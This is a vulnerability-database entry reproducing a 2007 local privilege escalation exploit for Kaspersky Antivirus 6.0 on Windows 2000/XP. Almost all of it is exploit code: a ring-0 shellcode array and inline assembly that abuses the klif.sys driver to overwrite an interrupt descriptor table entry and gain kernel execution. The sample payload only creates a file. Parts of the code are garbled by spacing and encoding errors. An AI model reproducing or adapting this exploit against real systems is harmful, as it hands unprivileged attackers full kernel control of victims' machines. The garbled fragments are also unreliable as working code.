Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62200713807
HistoryJan 17, 2007 - 12:00 a.m.

Kaspersky Antivirus 6.0 Local Privilege Escalation Exploit-vulnerability warning-the black bar safety net

2007-01-1700:00:00
佚名
www.myhack58.com
6
JSON

// kav 6.0 0day local priv escalation exploit
// by m4d
// http://unl0ck.net
#include <windows. h>
#include <stdlib. h>
#include <stdio. h>

// r0-shellcode creates C:\Hello.txt with “Hello from ring-0! :)”

unsigned char Shellcode[4 0 5] = {
0x55, 0x8B, 0xEC, 0x83, 0xC4, 0xBC, 0x60, 0x83, 0x4D, 0xE8, 0xFF, 0x0F, 0x01, 0x4D, 0xFA, 0x8B,
0x4D, 0xFC, 0x81, 0xC1, 0x50, 0x01, 0x00, 0x00, 0x66, 0x8B, 0x71, 0x06, 0xC1, 0xE6, 0x10, 0x66,
0x8B, 0x31, 0x4E, 0x66, 0x81, 0x3E, 0x4D, 0x5A, 0x75, 0xF8, 0x8B, 0x46, 0x3C, 0xA9, 0x00, 0xFF,
0xFF, 0xFF, 0x75, 0xEE, 0x81, 0x3C, 0x30, 0x50, 0x45, 0x00, 0x00, 0x75, 0xE5, 0xE8, 0x00, 0x00,
0x00, 0x00, 0x58, 0x8D, 0x90, 0xB7, 0x00, 0x00, 0x00, 0x8D, 0x5A, 0x58, 0x8B, 0xC6, 0x6A, 0x0D,
0x59, 0xFF, 0xD3, 0x89, 0x45, 0xEC, 0x03, 0xD1, 0x8B, 0xC6, 0x6A, 0x08, 0x59, 0xFF, 0xD3, 0x89,
0x45, 0xF0, 0x03, 0xD1, 0x8B, 0xC6, 0x6A, 0x0C, 0x59, 0xFF, 0xD3, 0x89, 0x45, 0xF4, 0x03, 0xD1,
0x89, 0x55, 0xE4, 0x6A, 0x20, 0x58, 0x66, 0x89, 0x45, 0xE0, 0x66, 0x89, 0x45, 0xE2, 0x8D, 0x4D,
0xC0, 0xC7, 0x01, 0x18, 0x00, 0x00, 0x00, 0x83, 0x61, 0x04, 0x00, 0xC7, 0x41, 0x0C, 0x00, 0x02,
0x00, 0x00, 0x83, 0x61, 0x10, 0x00, 0x8D, 0x45, 0xE0, 0x89, 0x41, 0x08, 0x83, 0x61, 0x14, 0x00,
0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x20, 0x6A, 0x03, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x8D, 0x45,
0xD8, 0x50, 0x8D, 0x45, 0xC0, 0x50, 0x68, 0x04, 0x00, 0x10, 0x00, 0x8D, 0x45, 0xBC, 0x50, 0xFF,
0x55, 0xEC, 0x85, 0xC0, 0x75, 0x2D, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x17, 0x8B, 0x45, 0xE4, 0x0F,
0xB7, 0x4D, 0xE0, 0x03, 0xC1, 0x50, 0x8D, 0x45, 0xD8, 0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00,
0xFF, 0x75, 0xBC, 0xFF, 0x55, 0xF4, 0xFF, 0x75, 0xBC, 0xFF, 0x55, 0xF0, 0xC7, 0x45, 0xE8, 0xEF,
0xBE, 0xAD, 0xDE, 0x61, 0x8B, 0x45, 0xE8, 0xC9, 0xCF, 0x5A, 0x77, 0x43, 0x72, 0x65, 0x61, 0x74,
0x65, 0x46, 0x69, 0x6C, 0x65, 0x00, 0x5A, 0x77, 0x43, 0x6C, 0x6F, 0x73, 0x65, 0x00, 0x5A, 0x77,
0x57, 0x72, 0x69, 0x74, 0x65, 0x46, 0x69, 0x6C, 0x65, 0x00, 0x5C, 0x00, 0x3F, 0x00, 0x3F, 0x00,
0x5C, 0x00, 0x43, 0x00, 0x3A, 0x00, 0x5C, 0x00, 0x48, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x6C, 0x00,
0x6F, 0x00, 0x2E, 0x00, 0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x48, 0x65, 0x6C, 0x6C, 0x6F, 0x20,
0x66, 0x72, 0x6F, 0x6D, 0x20, 0x72, 0x69, 0x6E, 0x67, 0x2D, 0x30, 0x21, 0x20, 0x3A, 0x29, 0x0D,
0x0A, 0x60, 0x8B, 0x50, 0x3C, 0x8B, 0x54, 0x10, 0x78, 0x03, 0xD0, 0x8B, 0x5A, 0x20, 0x03, 0xD8,
0x33, 0xED, 0x8B, 0x4A, 0x18, 0x51, 0x8B, 0x4C, 0x24, 0x1C, 0x8B, 0x33, 0x03, 0xF0, 0x8B, 0x7C,
0x24, 0x18, 0xF3, 0xA6, 0x59, 0x74, 0x06, 0x45, 0x83, 0xC3, 0x04, 0xE2, 0xE8, 0x8B, 0x4A, 0x24,
0x03, 0xC8, 0x0F, 0xB7, 0x0C, 0x69, 0x8B, 0x6A, 0x1C, 0x03, 0xE8, 0x95, 0x03, 0x2C, 0x88, 0x89,
0x6C, 0x24, 0x1C, 0x61, 0xC3
};

typedef struct _FIRST_PARAM {
ULONG SwitchIndex;
ULONG Unknown; // 0xFF0002…0xFF000F, if this parameters won’t be in the list of klif.sys, sploit won’t work…
ULONG Value; // this value will rewrite DWORD of memory
} FIRST_PARAM, *PFIRST_PARAM;

void main(int argc, char* argv[])
{
__try
{
FIRST_PARAM Param1;
ULONG Param2; // pointer to write DATA - 8
CHAR Idtr[6];
CHAR IsKAVInstalled;
OSVERSIONINFOEX os;

os. dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
GetVersionEx((LPOSVERSIONINFO)&os);

if (os. dwPlatformId != VER_PLATFORM_WIN32_NT ||
os. dwMajorVersion != 5 ||
os. dwMinorVersion > 1)
{
printf(“This OS version unsupported\n”);
return;
}

// ��� ������ ���������, ���������� �� KAV��� ���

__asm {
cmp os. dwMinorVersion, 0
jnz short $+1 3
mov eax, 0F8h // 2k
jmp short $+7
mov eax, 11Ch // xp
int 2Eh

cmp eax, 0Ch
setz al
mov IsKAVInstalled, al
}

if (! IsKAVInstalled)
{
printf(“KAV6 didn’t installed\n”);
return;
}

Param1. SwitchIndex = 3; // Index of the jmp in case of switch()
Param1. Unknown = 0xFF0002;

__asm {
pusha
sidt Idtr

mov eax, dword ptr [Idtr+2]

add eax, 0DAh * 8 - 8
mov Param2, eax

// Write the lower DWORD IdtEntry

mov ecx, offset Shellcode
and ecx, 0000FFFFh
or ecx, 00080000h
mov Param1. Value, ecx // Set DWORD: [selector 0x0008 | LOWORD(Shellcode)]

push Param2
lea eax, Param1
push eax

mov edx, esp
cmp os. dwMinorVersion, 0
jnz short $+1 3
mov eax, 100h // 2k
jmp short $+7
mov eax, 124h // xp
int 2Eh
add esp, 2*4

// Write high DWORD IdtEntry

add Param2, 4

mov ecx, offset Shellcode
and ecx, 0FFFF0000h
or ecx, 0000EE00h
mov Param1. Value, ecx // Set DWORD: [HIWORD(Shellcode) | gate parameters 0xEE00]

push Param2
lea eax, Param1
push eax

mov edx, esp
cmp os. dwMinorVersion, 0
jnz short $+1 3
mov eax, 100h // 2k
jmp short $+7
mov eax, 124h // xp
int 2Eh
add esp, 2*4

// Call Gate :-) (COLGATE)

push fs
int 0DAh
pop fs

popa
}

printf(“Exploited successful\n”);
}
__except(1) {
printf(“Can’t create interrupt gate\n”);
}
}

// 15.01.07 MaD

// milw0rm.com [2007-01-15]

JSON